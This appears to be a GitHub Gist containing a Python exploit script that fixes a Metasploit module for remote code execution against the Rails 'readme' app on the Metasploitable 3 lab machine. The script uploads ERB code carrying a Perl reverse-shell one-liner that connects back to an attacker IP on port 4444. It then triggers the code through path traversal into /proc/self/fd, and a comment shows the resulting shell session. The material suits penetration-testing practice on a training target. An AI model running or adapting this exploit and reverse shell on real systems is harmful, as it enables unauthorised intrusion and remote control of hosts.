Last active
February 8, 2020 23:40
-
-
Save pich4ya/5860f7c7bbd26337f9423a03b2ab1b8f to your computer and use it in GitHub Desktop.
Fix broken rails_dynamic_render_code_exec's exploit against Metasploitable 3
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Exploit for Metasploitable 3 - render params[:os] 's RCE | |
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick | |
# This exploit slightly adjusts the temporary file extension to an empty string | |
import requests | |
# 1. tmp upload | |
host = "172.28.128.3" | |
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" | |
headers = {"Content-Type": "multipart/form-data; boundary=_Part_596_558276832_972275724", "Connection": "close"} | |
payload = "--_Part_596_558276832_972275724\r\nContent-Disposition: form-data; name=\"ggez\"; filename=\"ggez\"\r\n\r\n<%=`"+cmd+"`%>\r\n--_Part_596_558276832_972275724--\r\n" | |
requests.post("http://"+host+":3500/", headers=headers, data=payload) | |
# 2. trigger | |
requests.get("http://"+host+":3500/readme/?os=../../../../proc/self/fd/7") | |
''' | |
$ python readme_render_exploit.py | |
$ nc -lvp 4444 | |
listening on [any] 4444 ... | |
192.168.15.1: inverse host lookup failed: Unknown host | |
connect to [192.168.15.133] from (UNKNOWN) [192.168.15.1] 50209 | |
pwd | |
/opt/readme_app | |
id | |
uid=1124(chewbacca) gid=100(users) groups=100(users),999(docker) | |
ls | |
Gemfile | |
Gemfile.lock | |
README.md | |
Rakefile | |
app | |
bin | |
config | |
config.ru | |
db | |
lib | |
log | |
public | |
start.sh | |
test | |
tmp | |
vendor | |
''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment